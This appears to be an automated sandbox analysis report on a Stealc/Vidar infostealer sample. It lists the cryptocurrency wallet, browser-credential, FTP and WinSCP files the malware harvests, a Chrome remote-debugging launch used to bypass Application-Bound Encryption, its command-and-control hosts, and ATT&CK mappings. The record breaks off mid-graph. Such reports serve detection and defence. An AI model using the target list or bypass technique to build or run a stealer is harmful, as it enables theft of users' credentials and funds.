                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Attempt to bypass Chrome Application-Bound Encryption
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        Yara detected Stealc
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a3ecc0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C710C40 sqlite3_bind_zeroblob,3_2_6C710C40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C710D60 sqlite3_bind_parameter_name,3_2_6C710D60
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C638EA0 sqlite3_clear_bindings,3_2_6C638EA0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C710B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C710B40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C636410 bind,WSAGetLastError,3_2_6C636410
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C636070 PR_Listen,3_2_6C636070
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C63C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,3_2_6C63C050
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C63C030 sqlite3_bind_parameter_count,3_2_6C63C030
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6360B0 listen,WSAGetLastError,3_2_6C6360B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5C22D0 sqlite3_bind_blob,3_2_6C5C22D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6363C0 PR_Bind,3_2_6C6363C0

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		1
                        File and Directory Permissions Modification                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        Create Account                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		11
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		1
                        Windows Service                        		1
                        Extra Window Memory Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		4
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		1
                        Remote Access Software                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Service Execution                        		1
                        Scheduled Task/Job                        		1
                        Windows Service                        		1
                        Abuse Elevation Control Mechanism                        		NTDS166
                        System Information Discovery                        		Distributed Component Object Model11
                        Input Capture                        		3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd1
                        Registry Run Keys / Startup Folder                        		512
                        Process Injection                        		3
                        Obfuscated Files or Information                        		LSA Secrets1
                        Query Registry                        		SSHKeylogging14
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		Cached Domain Credentials361
                        Security Software Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                        Registry Run Keys / Startup Folder                        		1
                        Extra Window Memory Injection                        		DCSync41
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                        Masquerading                        		Proc Filesystem13
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadow1
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
                        Process Injection                        		Network Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                        Remote System Discovery                        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555865 Sample: S0FTWARE.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 103 fuare.xyz 2->103 105 t.me 2->105 107 8 other IPs or domains 2->107 141 Suricata IDS alerts for network traffic 2->141 143 Found malware configuration 2->143 145 Malicious sample detected (through community Yara rule) 2->145 149 16 other signatures 2->149 10 S0FTWARE.exe 2->10         started        13 service.exe 2->13         started        16 Updater.exe 2->16         started        18 4 other processes 2->18 signatures3 147 Performs DNS queries to domains with low reputation 103->147 process4 dnsIp5 175 Writes to foreign memory regions 10->175 177 Allocates memory in foreign processes 10->177 179 Injects a PE file into a foreign processes 10->179 21 BitLockerToGo.exe 1 158 10->21         started        101 C:\Windows\SysWOW64\...\service.exe (copy), PE32 13->101 dropped 181 Multi AV Scanner detection for dropped file 13->181 183 Switches to a custom stack to bypass stack traces 13->183 26 cmd.exe 13->26         started        185 Found direct / indirect Syscall (likely to bypass EDR) 16->185 109 127.0.0.1 unknown unknown 18->109 111 192.168.2.16 unknown unknown 18->111 113 3 other IPs or domains 18->113 28 msedge.exe 18->28         started        30 msedge.exe 18->30         started        32 msedge.exe 18->32         started        file6 signatures7 process8 dnsIp9 115 fuare.xyz 116.203.0.159, 443, 49836, 49847 HETZNER-ASDE Germany 21->115 117 t.me 149.154.167.99, 443, 49829 TELEGRAMRU United Kingdom 21->117 123 2 other IPs or domains 21->123 93 C:\Users\user\AppData\...\Updater[1].exe, PE32 21->93 dropped 95 C:\Users\user\AppData\Local\...95ewApp[1].exe, PE32+ 21->95 dropped 97 C:\ProgramData\softokn3.dll, PE32 21->97 dropped 99 7 other files (5 malicious) 21->99 dropped 167 Attempt to bypass Chrome Application-Bound Encryption 21->167 169 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->169 171 Found many strings related to Crypto-Wallets (likely being stolen) 21->171 173 7 other signatures 21->173 34 AAFIJKKEHJ.exe 21->34         started        38 GHDAKKJJJK.exe 21->38         started        40 msedge.exe 2 10 21->40         started        46 2 other processes 21->46 42 conhost.exe 26->42         started        44 schtasks.exe 26->44         started        119 18.161.170.118 MIT-GATEWAYSUS United States 28->119 121 